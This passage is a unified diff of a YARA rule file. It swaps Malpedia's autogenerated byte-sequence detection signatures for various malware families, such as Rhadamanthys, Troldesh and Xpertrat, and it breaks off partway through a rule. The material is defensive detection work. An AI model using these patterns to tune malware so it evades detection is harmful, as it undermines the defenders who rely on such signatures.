+		$sequence_5 = { b800000000 59 5f 5e 5a 5b c9 }
+		$sequence_6 = { 7434 837d1000 742e 837d1400 7428 }
+		$sequence_7 = { 8bec 8b4508 3b450c 7603 8b450c c9 c20800 }
+		$sequence_8 = { f7d0 48 59 5f }
+		$sequence_9 = { 7512 47 46 e2f6 b801000000 59 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 470016
 }
-rule MALPEDIA_Win_Miniblindingcan_Auto : FILE
+rule MALPEDIA_Win_Reactorbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7798fac4-4e5d-566f-a335-bf730671b981"
+		id = "a4f3c70a-5bf3-5f9e-9dd8-eacb62aa112d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miniblindingcan_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.reactorbot_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "58b505c72082d28e67c192bf52fda135efb347b75fec700d41c24b4ca9aa0285"
+		logic_hash = "577d7a26f158c3905b8b827065bc6c12a25adcae231dbaf0bdeb91e6773e1cc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125663,32 +125941,38 @@ rule MALPEDIA_Win_Miniblindingcan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8bd1 b83f000000 0f05 c3 4c8bd1 b840000000 0f05 }
-		$sequence_1 = { 7715 488d0de0ce0000 410fb7c5 0fbe4c08e0 83e10f eb03 418bca }
-		$sequence_2 = { 8bd3 498bcc e8???????? 448b6c2438 488bf8 44896c2450 4c8d4608 }
-		$sequence_3 = { 4883c708 4883c108 482bcf 488b0439 488907 4883c708 493bf8 }
-		$sequence_4 = { 4889742438 488d45e0 4889742430 4c8d8736040000 448bcb 33d2 33c9 }
-		$sequence_5 = { 8bc2 4889742420 c1e81f 03d0 6603d2 66895509 488d55c7 }
-		$sequence_6 = { 488364246000 488364245800 c60100 488d4c2460 488d1500a20100 33db 215c2450 }
-		$sequence_7 = { ff15???????? e9???????? 488bcb ff15???????? 33c0 488b8c2400250000 4833cc }
-		$sequence_8 = { 483bd8 0f87e8020000 0f1003 4803de f30f7f07 440fb70b 498bc8 }
-		$sequence_9 = { 4c8bc6 48ffc6 418838 e9???????? 49ffc4 498b0c24 490fafc8 }
+		$sequence_0 = { ff15???????? c705????????00000000 c705????????01000000 5d c3 }
+		$sequence_1 = { 52 e8???????? 8d85bcfdffff 50 6804010000 8d8d88fbffff }
+		$sequence_2 = { 8d4de8 51 ff15???????? 8945f8 }
+		$sequence_3 = { 894dfc 8b55fc a1???????? 8982b8000000 }
+		$sequence_4 = { 51 ff15???????? c745f801000000 8b45f8 }
+		$sequence_5 = { 51 ff15???????? 8945fc 837dfc00 7479 }
+		$sequence_6 = { 50 ff15???????? 83c408 c745f401000000 8b45f4 }
+		$sequence_7 = { 6804010000 8d8d80f9ffff 51 e8???????? }
+		$sequence_8 = { 6bc005 83e803 99 b999000000 }
+		$sequence_9 = { 83c005 99 b905000000 f7f9 }
+		$sequence_10 = { ff15???????? e8???????? 833d????????00 7509 833d????????00 }
+		$sequence_11 = { 69c0b13a0200 99 83e203 03c2 }
+		$sequence_12 = { 7402 eb0c c705????????b80b0000 eb0a c705????????e8030000 }
+		$sequence_13 = { 83e101 f7d9 81e12083b8ed 33c1 }
+		$sequence_14 = { ba2f000000 488d4c2440 ff15???????? 4889442420 48837c242000 }
+		$sequence_15 = { 488b442468 813850450000 0f859f030000 488b442468 4883c018 }
 
 	condition:
-		7 of them and filesize < 453632
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Troldesh_Auto : FILE
+rule MALPEDIA_Win_Poldat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dfc58f44-005d-550d-86a0-6e27d1dbdd91"
+		id = "a4b71e9b-caa3-5e09-abcb-8fc111c1e88a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.troldesh_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poldat_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "6931e846879cddb9876cefe6a37d24256d508a47e814ed459478812a95ed70dc"
+		logic_hash = "eec21397be824c40480269ad179cee66cff4f29ddc631fb679aa6de7be434481"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125702,34 +125986,34 @@ rule MALPEDIA_Win_Troldesh_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb05 8945fc 33c0 3bc3 0f85cafeffff 0375fc 8b4758 }
-		$sequence_1 = { e9???????? 8b8b70040000 83f902 7d0a 68???????? e9???????? 8b8374040000 }
-		$sequence_2 = { eb64 6a48 57 ff7514 e8???????? 83c40c 6a14 }
-		$sequence_3 = { ff7508 e8???????? 83c40c 85c0 740d e8???????? 83c8ff }
-		$sequence_4 = { e8???????? 8b45f4 59 5e c9 c3 8b442408 }
-		$sequence_5 = { ff30 e8???????? 59 8b75f8 834dd8ff 85f6 7408 }
-		$sequence_6 = { e8???????? ff750c 8b5dec ff7508 8bf3 e8???????? ff750c }
-		$sequence_7 = { f6401080 7409 83bedc00000000 741a 85cf 7505 857810 }
-		$sequence_8 = { e8???????? 8b45f4 8b7004 3bf3 0f8e12010000 895de0 e8???????? }
-		$sequence_9 = { e8???????? 85ed 751e 68???????? 56 686d030000 e8???????? }
+		$sequence_0 = { 8b35???????? 6a08 66ab 58 }
+		$sequence_1 = { 57 6a05 6a00 68???????? }
+		$sequence_2 = { 50 e8???????? 68fe010000 8d86b8070000 57 }
+		$sequence_3 = { 8a50ff 881431 41 48 3d???????? 7ff1 8d45fc }
+		$sequence_4 = { 8b0c9d68c34100 8b5e04 23ca 03cb 33db 8a1cce 8d34ce }
+		$sequence_5 = { 50 ff15???????? 56 e8???????? 59 5f 5e }
+		$sequence_6 = { 8b4c241c 8b0c8d68c34100 23cf 03c1 8b4c241c d3ef 03ca }
+		$sequence_7 = { 750a c74720a0324000 895728 395724 7507 }
+		$sequence_8 = { 7233 e9???????? 8b4c243c 8b5c2410 8b7104 c7411824d84100 }
+		$sequence_9 = { f7f9 8bfa ffd6 50 }
 
 	condition:
-		7 of them and filesize < 3915776
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Oldbait_Auto : FILE
+rule MALPEDIA_Elf_Hideandseek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de1960aa-dffc-50a3-b5af-d60e93de2ed5"
+		id = "98de3f6a-a564-55ea-8fed-c2f9d5e8c7a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oldbait_auto.yar#L1-L227"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.hideandseek_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "56d5ee4ed7de5e4bf6d19f067af8af7a888733392a830afd56b63d7b093ebe45"
+		logic_hash = "831bf70ed51337c7cfb50b54eee15779cbace8e90d2493dbccfcb114f36dd2a6"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125741,46 +126025,32 @@ rule MALPEDIA_Win_Oldbait_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 ff15???????? 85c0 7505 e9???????? 6a00 6880000000 }
-		$sequence_1 = { 8d70ff 85f6 7626 8b4510 }
-		$sequence_2 = { 8a09 888800b01800 ebda 8b45fc 0531b11800 }
-		$sequence_3 = { 837d2000 7432 66c7045f0d00 43 66c7045f0a00 }
-		$sequence_4 = { 57 8b7d08 8d70ff 85f6 }
-		$sequence_5 = { 8945f4 ff35???????? ff75fc ff55f4 5f 5e }
-		$sequence_6 = { 0145d8 33ff 8d837ff61800 803800 }
-		$sequence_7 = { 8bca 83f101 83e107 d3e8 30043a }
-		$sequence_8 = { 0145d4 41 c1ea04 75dc }
-		$sequence_9 = { 42 3bd6 894510 72da 8bc7 5f }
-		$sequence_10 = { 0145d8 8b45d8 3b45c8 7cc2 }
-		$sequence_11 = { 8bec 8b450c 56 33d2 }
-		$sequence_12 = { 01459c 8b45c8 8945f8 eb05 }
-		$sequence_13 = { 0145d8 8b45f0 ff45ec 0fb64004 }
-		$sequence_14 = { 0145d8 8bb54cffffff 56 ff55d0 }
-		$sequence_15 = { 0103 01451c 8b06 8bc8 c1e906 }
-		$sequence_16 = { 57 8945f0 8945f4 894dec 0f8387000000 895514 83651407 }
-		$sequence_17 = { f7d9 1bc9 f7d1 234d14 83f908 }
-		$sequence_18 = { a3???????? 8d85c0feffff 68???????? 50 ff55dc 8d8dc0feffff }
-		$sequence_19 = { 8d45f4 50 8d45dc 50 68???????? ff75f8 }
-		$sequence_20 = { 8d85bcfdffff 6a01 50 8d85c0feffff 50 68???????? }
-		$sequence_21 = { 83e007 0a1c30 0fb64437fe 03c2 }
-		$sequence_22 = { ffd6 ffd0 53 ff55e4 90 90 }
-		$sequence_23 = { 56 8b7514 3bc1 57 8945f0 8945f4 }
+		$sequence_0 = { 8d1406 89cb 29c3 89d8 eb07 803a20 740f }
+		$sequence_1 = { 50 8d44241c 50 ff74242c e8???????? 59 }
+		$sequence_2 = { 8b4530 0facd010 c1ea10 88412d }
+		$sequence_3 = { 53 83ec0c 8b7c2420 8b6c2424 e8???????? 31d2 84c0 }
+		$sequence_4 = { 4f 85ff 75e4 eb42 a1???????? 85c0 }
+		$sequence_5 = { 752e 85ed 7512 52 52 50 56 }
+		$sequence_6 = { 53 53 e8???????? 83c410 89c3 85c0 0f8577050000 }
+		$sequence_7 = { 8a03 84c0 780e 0fb6c0 894500 8d4301 e9???????? }
+		$sequence_8 = { e8???????? 5b 85c0 5e 0f858dfeffff eb12 }
+		$sequence_9 = { 83c410 e9???????? c7460c00000000 e9???????? 50 50 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_W32Times_Auto : FILE
+rule MALPEDIA_Win_Rhadamanthys_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f8cab1b-98aa-5ea0-a38a-8a88f0f95260"
+		id = "a80a8ef9-ea3f-56c2-85d5-70398e8fed62"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.w32times_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhadamanthys_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "9e441675ff42eb62c793bece475e1238e60eea81c292e3ab2a330e03a3660487"
+		logic_hash = "33afe88ed91c55c9115df6fb51e8b7670279afd4e605824b7c9b26fba3c0f08d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125794,32 +126064,32 @@ rule MALPEDIA_Win_W32Times_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d 5b 81c4ec0c0000 c3 85ed }
-		$sequence_1 = { 6a03 55 6a01 8d8c2410080000 6800000080 }
-		$sequence_2 = { 33db b900400000 33c0 8d7c2414 f3ab 8d442414 50 }
-		$sequence_3 = { 85c0 7505 bb02000000 6a28 }
-		$sequence_4 = { 53 52 50 ff15???????? 8b4c2434 83c424 51 }
-		$sequence_5 = { 7518 68???????? ffd6 68???????? c705????????01000000 }
-		$sequence_6 = { 8b15???????? 52 ffd3 892d???????? a1???????? 3bc5 7416 }
-		$sequence_7 = { c3 50 68???????? ff15???????? 83c408 32c0 5f }
-		$sequence_8 = { 8bf7 c1e902 8bfa 8d9424f4030000 f3a5 8bc8 }
-		$sequence_9 = { 83c40c 85c0 0f85e00c0000 8b4b04 6a04 }
+		$sequence_0 = { 33f0 33fa 891ccd28100803 8bde 892ccd2c100803 8bef }
+		$sequence_1 = { 33f0 891ccd30280803 892ccd34280803 33fa 8bde 8bef 0fa4f708 }
+		$sequence_2 = { 0facdf08 81e7ff000000 3304fd28400803 3314fd2c400803 c1e918 }
+		$sequence_3 = { c1e608 33f0 891ccd28280803 892ccd2c280803 33fa }
+		$sequence_4 = { 66837e082c 0f8692000000 6a04 6800100000 6800004000 }
+		$sequence_5 = { 03c6 50 8b03 034508 50 e8???????? }
+		$sequence_6 = { c784248c01000068ea0303 c7842490010000b4190403 c784249401000070490403 c784249801000018770403 c784249c01000058a20403 c78424a001000010d30403 c78424a401000034010503 }
+		$sequence_7 = { 837df400 0f84a0010000 8365e400 eb07 8b45e4 }
+		$sequence_8 = { 5e 5b c9 c20c00 8b4c2404 8a01 }
+		$sequence_9 = { c7842418020000383f0403 c784241c020000c46c0403 c7842420020000449a0403 c784242402000034ca0403 c7842428020000fcf90403 c784242c020000182b0503 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 1111040
 }
-rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE
+rule MALPEDIA_Win_Spectre_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cfc6ae1c-00c8-513e-86f0-d4e28caf1338"
+		id = "97f71f8a-8fe2-5a94-98b9-e19f44e57e9b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_mailsniffer_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spectre_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "fa3a7d3b021e61998435bd86dd4adccaaab84e20b590af9e4f54303f32d0d67f"
+		logic_hash = "fb8efa47f6cbb2730748ec520c0057da98d0d3b4bb855873b3521ccc59bde3f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125833,32 +126103,32 @@ rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81ec1c020000 56 6a1c 58 8945f0 c745f4c89d2d01 8945f8 }
-		$sequence_1 = { 2b75fc 57 57 ff7510 81c6???????? 56 57 }
-		$sequence_2 = { c20400 a1???????? 89442430 8d842450020000 50 c744242cf54f2d01 c744243041512d01 }
-		$sequence_3 = { 6800300000 50 57 53 8945e8 894dfc ff15???????? }
-		$sequence_4 = { 8b4508 895dec e8???????? 8b7b0c 037d08 8365fc00 }
-		$sequence_5 = { 53 8d4594 50 8d4588 }
-		$sequence_6 = { 0f84a0000000 e8???????? 50 ff35???????? e8???????? 59 59 }
-		$sequence_7 = { d1e8 83e701 3304bd00d02d01 33048d04992e01 42 }
-		$sequence_8 = { 8d45dc 50 ff15???????? 66837ddc00 8b87a0902d01 7403 6a29 }
-		$sequence_9 = { ffd7 85c0 7570 8bc6 50 8d84249c030000 }
+		$sequence_0 = { 40 8945b0 894dac 3d00100000 7215 8d45b0 50 }
+		$sequence_1 = { 8d8c243c010000 e8???????? 8b8c2454010000 5f 5e 5d 5b }
+		$sequence_2 = { 897110 897114 e8???????? e8???????? 83c418 83ec18 8bcc }
+		$sequence_3 = { 8d45cc 57 ff7510 8b7d08 50 e8???????? 59 }
+		$sequence_4 = { 51 e8???????? 59 59 885c2410 8d8424a0000000 ff742410 }
+		$sequence_5 = { 58 0fb60c8556424600 0fb6348557424600 8bf9 8985d8f6ffff c1e702 57 }
+		$sequence_6 = { 8b30 ffd7 bb???????? 6685c0 0f85b0030000 b9a2000000 83fe6e }
+		$sequence_7 = { 85ff 7425 8b442444 2bc3 50 53 }
+		$sequence_8 = { 53 53 ff7584 ffd7 85c0 740c ff36 }
+		$sequence_9 = { 3dffffff3f 7479 40 57 50 89442414 e8???????? }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 990208
 }
-rule MALPEDIA_Win_Shujin_Auto : FILE
+rule MALPEDIA_Win_Hermeticwizard_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a43000e-7971-5f56-a789-53c0781b645d"
+		id = "d95bc7c2-314b-5852-896f-2ab463620583"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shujin_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermeticwizard_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "9e7c36d5a8e7a7e0db70030a2edbd679a6e8a68faaf57024a99c72983d6e53eb"
+		logic_hash = "a04b957d824c192d4445e19ff2c64beb34502a356441d2497a3f568d12cc4736"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125872,71 +126142,77 @@ rule MALPEDIA_Win_Shujin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 23d8 333c9de8994000 0fb6590b 23d0 333c95e8a14000 8b510a 897906 }
-		$sequence_1 = { 8b5df8 c1eb18 333c9de8954000 8b5dfc 23d8 333c9de8a14000 }
-		$sequence_2 = { 33d2 6bc003 85c0 7664 48 f7f7 }
-		$sequence_3 = { 53 8b1d???????? 40 8bf0 6a02 8d7e7e 57 }
-		$sequence_4 = { f8 660fb3d9 30d1 8b4e08 e8???????? 60 53 }
-		$sequence_5 = { ffd3 8db7f4030000 e8???????? 8d85fcfeffff 50 }
-		$sequence_6 = { 53 8b1d???????? 57 8bf8 eb07 57 ffd3 }
-		$sequence_7 = { 8a06 3c41 7430 3c42 742c 56 }
-		$sequence_8 = { e8???????? 52 ff742404 c745d843686563 ff3424 c6442404f2 }
-		$sequence_9 = { 56 8d45dc e8???????? 8d45ec 50 ff7620 ff15???????? }
+		$sequence_0 = { 8a87c0d10110 08441619 42 0fb64101 3bd0 }
+		$sequence_1 = { 33c0 eb11 ff37 ff15???????? 50 ff37 ff15???????? }
+		$sequence_2 = { 75e7 8b4d08 8d45e4 50 e8???????? 3b30 }
+		$sequence_3 = { 8bec 83ec14 56 8bf1 837e0400 }
+		$sequence_4 = { 85c0 0f95c2 85c0 74dd }
+		$sequence_5 = { 5d c3 55 8bec 3bca 7452 56 }
+		$sequence_6 = { 8bcb 52 ff33 e8???????? 8b5508 8b12 895508 }
+		$sequence_7 = { 7410 68???????? 8bce e8???????? 59 894304 }
+		$sequence_8 = { 66898d76ffffff 59 6a20 66898d78ffffff }
+		$sequence_9 = { 50 8d4dac e8???????? 8b4dc4 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 263168
 }
-rule MALPEDIA_Win_Unidentified_082_Auto : FILE
+rule MALPEDIA_Win_Xpertrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7772581c-e8cf-5615-a758-46ef9c1fc0b0"
-		date = "2021-10-07"
-		modified = "2021-10-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_082_auto.yar#L1-L124"
+		id = "e49e4f10-4f24-5d5f-a0ba-93859bc43e3e"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xpertrat_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "fdfe1ddce9f77ac8b465b0ddebe868c5e77078cf2b2457573a5b3810682f45ee"
+		logic_hash = "0756c58d6846e1ce6d5f3a4d4ce8c4c63505cae3368973abe64928b289231578"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20211007"
-		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
-		malpedia_version = "20211008"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d0dbc190200 0f1f4000 0f1f840000000000 418d4801 }
-		$sequence_1 = { ff5018 4c634510 488d0df40a0200 488bd8 33c0 }
-		$sequence_2 = { 4c634510 488d0d93fa0100 488bd8 33c0 488bd3 488905???????? 488905???????? }
-		$sequence_3 = { ff15???????? 488b0cdf ff15???????? 48c704dfffffffff }
-		$sequence_4 = { 4885c0 0f84ac010000 48833d????????00 0f849e010000 48833d????????00 0f8490010000 48833d????????00 }
-		$sequence_5 = { 488b0d???????? 8b5108 488b4910 4533c9 458d4130 4c89742420 }
-		$sequence_6 = { 33c0 e9???????? 8a07 4c8b7c2448 4c8d25a64c0100 4b8b0cfc ffc3 }
-		$sequence_7 = { 0f1f4000 0f1f840000000000 418d4801 0fb6c2 41ffc0 f7da }
-		$sequence_8 = { 488b4f18 4c8d4d10 488b01 488d1587000200 41b810000000 ff5018 4c634510 }
-		$sequence_9 = { 48894598 eb03 4533f6 488b05???????? 80782e00 740a 80782000 }
+		$sequence_0 = { ff08 40 0430 ff0a 4c 000c00 }
+		$sequence_1 = { 0d98000700 6e 74ff 6e }
+		$sequence_2 = { 0000 00a1cc004400 0bc0 7402 ffe0 68???????? b8???????? }
+		$sequence_3 = { 008a3800cc1c 5e 006c70ff 0808 }
+		$sequence_4 = { 0870ff 0d80000700 0474 ff0478 }
+		$sequence_5 = { ff05???????? 000d???????? 0878ff 0d98000700 6e }
+		$sequence_6 = { 006c70ff 0808 008f38001b26 001b 0d002a2364 ff08 }
+		$sequence_7 = { 007168 ff0468 ff0a 250004003c 6c 70ff 0808 }
+		$sequence_8 = { ff15???????? 6a00 6a05 6a01 8d55b4 6a00 }
+		$sequence_9 = { ff15???????? 6a00 68fbfdffff 8b06 }
+		$sequence_10 = { ff15???????? 6a00 6a05 56 ff15???????? 83c40c 33db }
+		$sequence_11 = { ff15???????? 6a00 6a01 6a01 8d45b4 6a00 }
+		$sequence_12 = { ff15???????? 6a00 6a04 8b4510 }
+		$sequence_13 = { ff15???????? 6a00 68???????? 8d4dcc }
+		$sequence_14 = { ff15???????? 6a00 6a02 56 }
+		$sequence_15 = { ff15???????? 6a00 6a00 6a01 6a03 }
 
 	condition:
-		7 of them and filesize < 414720
+		7 of them and filesize < 8560640
 }
-rule MALPEDIA_Win_Shareip_Auto : FILE
+rule MALPEDIA_Win_Dusttrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c1bb89d1-f372-58e3-b942-2bef06089e9d"
+		id = "94c0bae7-72b6-5bce-b0c6-34a621d70e05"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shareip_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dusttrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dusttrap_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "22f8defa170ad6011dfacc6043f0faf754eb6e381cb168ecc5d5e1f970ca56dc"
+		logic_hash = "f4b4f45042cbce5a99225f86a255feaeb3d8c391ba31ee586efa9930ba8ea747"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125950,32 +126226,32 @@ rule MALPEDIA_Win_Shareip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 399c24c8000000 747a 399c24bc000000 7412 8b9424ac000000 8b02 }
-		$sequence_1 = { 89742444 895c2440 885c2430 396c2460 720d 8b44244c 50 }
-		$sequence_2 = { 83f8ff 7566 be10000000 39742444 720d 8b542430 52 }
-		$sequence_3 = { 5b 83c450 c21000 6aff 68???????? 64a100000000 50 }
-		$sequence_4 = { 8d442440 50 e8???????? 8b4c241c 51 8d94242c020000 52 }
-		$sequence_5 = { 80f92e 750f 807a0100 8d6a01 0f8480000000 eb06 84c9 }
-		$sequence_6 = { 7463 8d842454010000 e8???????? 83bc24c000000008 7210 8b9424ac000000 52 }
-		$sequence_7 = { 8bd1 c1fa05 c1e006 030495a0b74500 eb05 b8???????? f6400420 }
-		$sequence_8 = { 8d78ff 8d742414 e8???????? 50 bf01000000 e8???????? 8bd0 }
-		$sequence_9 = { 51 53 56 8bcd e8???????? 8bce 53 }
+		$sequence_0 = { 7507 b904000000 eb1f 4181f800000060 7507 b920000000 eb0f }
+		$sequence_1 = { 488d15b1eb0000 33c9 ff15???????? 488b4c2448 85c0 7429 }
+		$sequence_2 = { 33df 8bfb 41895f50 4133f9 448bcf }
+		$sequence_3 = { 448d4205 4889442420 e8???????? 85c0 498bcd 480f498c24b8000000 }
+		$sequence_4 = { ff90e8000000 488bd8 4885c0 754c 89442430 448d4b30 488d442430 }
+		$sequence_5 = { 488bc2 448b0d???????? 90 443908 7507 6644394004 }
+		$sequence_6 = { 48896c2450 0f57c0 c744244800040000 4d8bcf 488b4958 4c89742440 448d4209 }
+		$sequence_7 = { 4055 57 488d6c24b1 4881ecf8000000 488b0d???????? 4885c9 }
+		$sequence_8 = { 48ffc1 33c2 69d093010001 493bc8 72ed 488d0dfe060200 660f1f440000 }
+		$sequence_9 = { 4c89642430 4c89642428 4c89642420 0f1145b0 e8???????? 3d03010000 7534 }
 
 	condition:
-		7 of them and filesize < 811008
+		7 of them and filesize < 421888
 }
-rule MALPEDIA_Win_Pcshare_Auto : FILE
+rule MALPEDIA_Win_Owlproxy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "41819f37-8279-594b-8188-e1afa20f2f95"
+		id = "638fb361-2ad3-53d0-8e4f-9ad0b735dcdb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pcshare_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.owlproxy_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b635afb96c2581863fb56aba8aaab8da9fbce00f8a052e881f8a8f014820c9d4"
+		logic_hash = "b8fac1ab1f13b504661c8bdcc9beeb57fc5ec6f3de1faa47de004dfa99391115"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125989,32 +126265,32 @@ rule MALPEDIA_Win_Pcshare_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d7c2418 33c0 f3a5 66a5 b935000000 }
-		$sequence_1 = { c744242c01000000 e8???????? 8b8c24e0010000 8dbc2410010000 33c0 83c410 8d5910 }
-		$sequence_2 = { 8bf0 85f6 7630 8b4d04 2bc6 50 8d1431 }
-		$sequence_3 = { 894124 c7413800000000 c7413c00000000 895134 c20c00 6aff 68???????? }
-		$sequence_4 = { e8???????? 895c2450 51 8d4c2414 8bc4 c784247801000004000000 89642468 }
